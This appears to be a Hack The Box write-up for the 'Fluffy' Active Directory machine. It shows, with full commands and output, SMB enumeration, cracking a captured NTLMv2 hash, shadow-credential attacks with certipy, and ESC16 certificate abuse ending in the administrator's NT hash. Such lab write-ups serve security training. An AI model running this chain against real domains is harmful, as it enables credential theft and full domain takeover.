Fluffy is an easy-difficulty machine from Hack The Box dealing initially with an exposed SMB share containing details on CVE-2025-24071 which we can abuse to sniff the handshake by user p.agila which is a member of Service Account Managers and has GenericAll SERVICE ACCOUNTS. We can abuse shadow credentials on winrm_svc to get user flag and later abuse ESC16 to get the administrator certificate by modifying the UPN for the ca_svc and abusing it with certipy to later authenticate with the administrator hash.
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-28 01:45:39Z) 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb | Not valid before: 2025-04-17T16:04:17 |_Not valid after: 2026-04-17T16:04:17 |_ssl-date: 2025-05-28T01:47:40+00:00; +7h00m00s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-05-28T01:47:38+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb | Not valid before: 2025-04-17T16:04:17 |_Not valid after: 2026-04-17T16:04:17 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-05-28T01:47:40+00:00; +7h00m01s from scanner time. | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb | Not valid before: 2025-04-17T16:04:17 |_Not valid after: 2026-04-17T16:04:17 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb | Not valid before: 2025-04-17T16:04:17 |_Not valid after: 2026-04-17T16:04:17 |_ssl-date: 2025-05-28T01:47:38+00:00; +7h00m00s from scanner time. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019 (88%) Aggressive OS guesses: Microsoft Windows Server 2019 (88%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 139/tcp) HOP RTT ADDRESS 1 657.54 ms 10.10.16.1 2 983.89 ms 10.10.11.69
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 216.14 seconds
We can see that the machine in a windows active directory Domain Controller (we can tell from the 88 kerberos port on it). We also figure out that the domain is fluffy.htb from ldap. So lets add that entry to our /etc/hosts file.
Exposed SMB share - ESC16 abuse
We have user credentials provided to us so we can use those to login to SMB and check if we have access to anything:
And indeed we do have READ and WRITE permissions on the IT share.
Looking at it we find a few interesting files:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
┌──(kali㉿kali)-[~] └─$ smbclient \\\\10.10.11.69\\IT -U j.fleischman%'J0elTHEM4n1990!' Try "help" to get a list of possible commands. smb: \> ls . D 0 Tue May 27 21:50:17 2025 .. D 0 Tue May 27 21:50:17 2025 Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025 Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025 KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025 KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025 Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
5842943 blocks of size 4096. 1684645 blocks available smb: \> get * NT_STATUS_OBJECT_NAME_INVALID opening remote file \* smb: \> get KeePass-2.58.zip parallel_read returned NT_STATUS_IO_TIMEOUT smb: \> get Upgrade_Notice.pdf
The pdf had references to recent CVEs that the system is vulnerable tom on of the is (CVE-2025-24071)[https://nvd.nist.gov/vuln/detail/CVE-2025-24071] which results in Exposure of sensitive information to an unauthorized actor in Windows File Explorer allowing an unauthorized attacker to perform spoofing over a network.
And indeed we do get a user hash. We crack it using john and we get the password:
1 2 3 4 5 6 7 8 9 10
┌──(kali㉿kali)-[~/CVE-2025-24071] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status prometheusx-303 (p.agila) 1g 0:00:00:01 DONE (2025-05-27 15:10) 0.8771g/s 3963Kp/s 3963Kc/s 3963KC/s proquis..programmercomputer Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed.
We also can use that or previous creds to run BloodHound on the system. Checking for what our current user can do: BloodHound
We can add p.agila to Service Accounts so we have genericwrite on the ca_svc:
┌──(kali㉿kali)-[~/CVE-2025-24071] └─$ certipy-ad shadow auto -dc-ip '10.10.11.69' -u '[email protected]' -p 'prometheusx-303' -target 'dc01.fluffy.htb' -account winrm_svc Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '41b73771-9d63-53e9-3145-56e150cce6a7' [*] Adding Key Credential with device ID '41b73771-9d63-53e9-3145-56e150cce6a7' to the Key Credentials for'winrm_svc' [*] Successfully added Key Credential with device ID '41b73771-9d63-53e9-3145-56e150cce6a7' to the Key Credentials for'winrm_svc' [*] Authenticating as 'winrm_svc' with the certificate [*] Using principal: [email protected] [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'winrm_svc.ccache' [*] Trying to retrieve NT hashfor'winrm_svc' [*] Restoring the old Key Credentials for'winrm_svc' [*] Successfully restored the old Key Credentials for'winrm_svc' [*] NT hashfor'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
[!] Failed to resolve: FLUFFY.HTB [*] Updating user 'ca_svc': userPrincipalName : administrator [*] Successfully updated 'ca_svc'
And we can now claim the hash for ca_svc:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
└─$ certipy-ad shadow auto -dc-ip '10.10.11.69' -u '[email protected]' -p 'prometheusx-303' -target 'dc01.fluffy.htb' -account ca_svc Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '7203dfb1-1b0d-2033-9e2e-29d873aa865d' [*] Adding Key Credential with device ID '7203dfb1-1b0d-2033-9e2e-29d873aa865d' to the Key Credentials for'ca_svc' [*] Successfully added Key Credential with device ID '7203dfb1-1b0d-2033-9e2e-29d873aa865d' to the Key Credentials for'ca_svc' [*] Authenticating as 'ca_svc' with the certificate [*] Using principal: [email protected] [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'ca_svc.ccache' [*] Trying to retrieve NT hashfor'ca_svc' [*] Restoring the old Key Credentials for'ca_svc' [*] Successfully restored the old Key Credentials for'ca_svc' [*] NT hashfor'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
We can now request any cert template with client authentication, User works fine:
[*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 19 [*] Got certificate with UPN 'administrator' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx'
[!] Failed to resolve: FLUFFY.HTB [*] Updating user 'ca_svc': userPrincipalName : ca_svc [*] Successfully updated 'ca_svc'
And we can now authenticate as administrator:
1 2 3 4 5 6 7 8 9
└─$ certipy-ad auth -dc-ip '10.10.11.69' -pfx administrator.pfx -domain fluffy.htb -debug Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected] [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hashfor'administrator' [*] Got hashfor'[email protected]': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
We can now use this to login and claim the root and user flags. (as for user, its shadow creds)
